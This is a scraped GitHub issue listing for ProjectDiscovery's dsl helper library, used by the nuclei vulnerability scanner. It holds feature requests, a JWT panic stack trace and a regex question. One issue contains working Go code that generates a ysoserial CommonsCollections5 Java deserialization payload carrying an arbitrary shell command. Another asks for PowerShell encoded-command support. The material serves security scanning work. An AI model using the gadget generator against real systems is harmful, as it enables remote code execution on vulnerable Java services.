projectdiscovery / dsl Goto Github PK
View Code? Open in Web Editor NEWDSL engine
License: MIT License
dsl's People
Contributors
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot]")
Stargazers
Watchers
Forkers
luitelsamikshya st0pli daniel-007 papyrusdo gswan-io atlassion esonhugh nonsleepr manuelberrueta iamnoooob lz520520 v1rtu0l deltared1a vcore8 excloudx6 ciyfly xuedipiaofei chriss-0x01dsl's Issues
Support for `commons-collections5` in `generate_java_gadget` function
package main
import (
"bytes"
"encoding/hex"
_ "encoding/hex"
"fmt"
)
func main() {
//fmt.Println(generateCommonsCollections5Payload("touch /tmp/success666"))
fmt.Println(hex.EncodeToString(generateCommonsCollections5Payload("touch /tmp/success666")))
}
func generateCommonsCollections5Payload(cmd string) []byte {
buffer := &bytes.Buffer{}
prefix, _ := hex.DecodeString("aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000005574002679736f73657269616c2e7061796c6f6164732e436f6d6d6f6e73436f6c6c656374696f6e7335740018436f6d6d6f6e73436f6c6c656374696f6e73352e6a6176617400096765744f626a6563747371007e000b0000002f71007e000d71007e000e71007e000f7371007e000b0000002274001979736f73657269616c2e47656e65726174655061796c6f616474001447656e65726174655061796c6f61642e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001a78737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b657971007e00014c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00017870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e003200000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00327371007e002b7571007e002f00000002707571007e002f00000000740006696e766f6b657571007e003200000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e002f7371007e002b757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007870000000017400")
buffer.Write(prefix)
buffer.WriteString(string(rune(len(cmd))))
buffer.WriteString(cmd)
suffix, _ := hex.DecodeString("740004657865637571007e00320000000171007e00377371007e0027737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878")
buffer.Write(suffix)
return buffer.Bytes()
}
Fix zlib and other decompression package bombs
add `ErrParsingErr` to support hiding warnings downstream
Proposed Changes
- implemented for projectdiscovery/nuclei#3950
- projectdiscovery/katana#537
Adding helper to obtain public ip
Description
Add public_ip helper to obtain the public facing ipv4
Add caching layer for deterministic functions
Please describe your feature request:
Most helper functions are deterministic (output remains the same with the same input), and a few of them might be invoked multiple times within the same template, introducing a lot of potential delay in elaboration (especially those involving network/disk activity - eg. jarm with ten tls connections). The issue is about introducing an in-memory cache that stores with short TTL (e.g. 60 seconds) with a maximum capacity.
Details
- It must be possible to mark a helper function as deterministic (eg. map/slice)
- The cache should support auto eviction with a maximum number of items and TTL per item
- An accessed item should zero the TTL time
- When a deterministic helper is invoked, the logic should check if the full signature
function_name(args_values...)(note: a hashing function can be used due to the deterministic property) is present in the cache and still valid and in such case retrieve the value without recalculating the whole return value.
Add inflate and deflate helpers
Using compress/flate package
Add helper to format text ProperCase
Please describe your feature request:
It would be useful to add the following helpers:
to_proper(input string) string | Transforms the input into ProperCase characters | to_proper("hello") | Hello
Describe the use case of this feature:
Would be Useful for Fuzzing filenames/Usernames
Function to supports RSA encryption
From projectdiscovery/nuclei-templates#7493
I encountered a vulnerability in the system, which uses rsa encryption to encrypt the parameters during the login phase. During the vulnerability mining process, I already knew the public key used for encryption, but when I wrote the nuclei template, I couldn't find the calculation function related to rsa encryption. Is there any way i can implement this encryption process through the nuclei template
The encryption process is implemented using JSEncrypt,and encryption scheme is RSAES-PKCS1-V1_5
Add Index helper
Add helper function to pick item at position n within slice boundaries
Migrate all helper function and dsl logic from nuclei to this repo
Proposed Changes
Please describe your feature request:
- DSL helper functions in nuclei should be migrated to dsl repo https://github.com/projectdiscovery/dsl
- Add documentation of new helper functions (jwt , json etc )
Describe the use case of this feature:
- DSL is imported in proxify and httpx and some helper functions that are available in nuclei are not available in them
- helper functions should be consistent across proxify,nuclei and httpx
DSL function for flask_unsign
Please describe your feature request:
https://twitter.com/_0xf4n9x_/status/1651455454395129856
Describe the use case of this feature:
reference: https://twitter.com/_0xf4n9x_/status/1651455102774050816
I continued to explore the generation of this session value and found that it is only valid for 24 hours, which means that the hard-coded session value in the template is not valid long enough, which will lead to a missed vulnerability detection.
pls add UTF16 encoding (for powershell command)
Hi all, pls add UTF16 encoding (for powershell command)
thx.
example:
package main
import (
"encoding/base64"
"fmt"
"golang.org/x/text/encoding/unicode"
)
func PowerShell(script string) (string, error) {
uni := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM)
encoded, err := uni.NewEncoder().String(script)
if err != nil {
return "", err
}
return base64.StdEncoding.EncodeToString([]byte(encoded)), nil
}
func main(){
a,_ :=PowerShell("test")
fmt.Println(a)
}
Usage of HMAC.DIGEST() as in python
How can I replicate the capabilities provided by the Python hmac.digest() function using Nuclei hmac helper function. As far as i see nuclei does not support hmac.digest.
Python Example
token=base64.b64encode(hmac.new(secret,data,"sha256").digest());
Nuclei
token={{base64(hmac("sha256",data,secret))}}
Is there a way to replicate python hmac.digest in nuclei.
\d not working
When using the following code, nuclei 2.8.6 throws an error:
"regex('(?i)server: apache/\d', all_headers)"
Error occurred loading template servertokens.yaml: yaml: line 23: found unknown escape character
Why does this not work as expected? Does this need multiple backslashes? According to https://pkg.go.dev/regexp it should support \d.
Only "regex('(?i)server: apache/[0-9]', all_headers)" works.
Add jarm calculation helper
Replace govaluate with same nuclei embedded scripting engine
Based on projectdiscovery/nuclei#3981 and projectdiscovery/nuclei#4015
The helper functions should retain same function signature for backward compatibility. Ideally they should be reusable as global functions within the engine itself as previously implemented with https://github.com/projectdiscovery/nebula in projectdiscovery/nuclei#914
Add types/structs pack/unpack
Ref: https://docs.python.org/3/library/struct.html
Implemented at: https://github.com/Mzack9999/gostruct
algorithm in generate_jwt helper should be a required parameter
id: test
variables:
json: |
{
"tt": "tt"
}
jwt: "{{generate_jwt(json)}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
{{print_debug(jwt)}}$ go run . -debug -verbose -duc -t test.yaml -u http://localhost:80
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.9.15
projectdiscovery.io
[INF] Current nuclei version: v2.9.15 (outdated)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x18c42ee]
goroutine 14 [running]:
github.com/kataras/jwt.encodeToken({0x0, 0x0}, {0x1d454c0, 0x3c3c820}, {0xc0000f46e0, 0x156, 0x160}, {0x0?, 0x0?})
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/token.go:35 +0x8e
github.com/kataras/jwt.signToken({0x0, 0x0}, {0x1d454c0, 0x3c3c820}, 0x0, {0x1e32e00?, 0xc000d60ae0?}, {0x0, 0x0}, {0x0, ...})
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/sign.go:80 +0x10d
github.com/kataras/jwt.Sign(...)
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/sign.go:35
github.com/projectdiscovery/dsl.init.0.func77({0xc000d78620, 0x1, 0x0?})
/home/marco/go/src/github.com/projectdiscovery/dsl/dsl.go:1077 +0x635
github.com/projectdiscovery/dsl.dslFunction.Exec({0x0, {0x2209fa4, 0xc}, 0x0, {0xc000544300, 0x1, 0x1}, 0x286b518}, {0xc000d78620, 0x1, ...})
/home/marco/go/src/github.com/projectdiscovery/dsl/func.go:54 +0x29c
github.com/Knetic/govaluate.planFunction.makeFunctionStage.func1({0xc0006ad900?, 0x1d7c2a0?}, {0x1d7c2a0, 0xc000d78300?}, {0x227bc26?, 0x412401?})
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/evaluationStage.go:245 +0xac
github.com/Knetic/govaluate.EvaluableExpression.evaluateStage({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, 0xc0006ad9a0, ...)
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:232 +0x59d
github.com/Knetic/govaluate.EvaluableExpression.Eval({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, {0x2b31700, ...})
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:163 +0x125
github.com/Knetic/govaluate.EvaluableExpression.Evaluate({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, 0xc000d609c0)
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:137 +0x94
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions.evaluate({0xc000050150?, 0xc000d609c0?}, 0xc000ecf330?)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go:61 +0x192
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions.Evaluate(...)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go:30
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*requestGenerator).Make(0xc0006ac140, {0x2b45aa0, 0xc0008ac0e0}, 0xc000d404b0, {0xc000050150?, 0x4127a5?}, 0xc000d604b0, 0xc000d60390)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/build_request.go:140 +0xb08
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithResults.func1({0xc000050150, 0x65}, 0xc?, 0x495eee?)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:365 +0x16d
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithResults(0xc00093a8c0, 0xc000d404b0, 0xc000d60390, 0xc000d603c0, 0xc000d4c140)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:451 +0x34c
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer.(*Executer).Execute(0xc00035e3a0, 0xc000d40498)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer/executer.go:94 +0x43e
github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeTemplateWithTargets.func2.1(0x1be1c87?, 0x0?, 0xc000d4e860)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/core/executors.go:128 +0x289
created by github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeTemplateWithTargets.func2 in goroutine 13
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/core/executors.go:105 +0x4f1
exit status 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.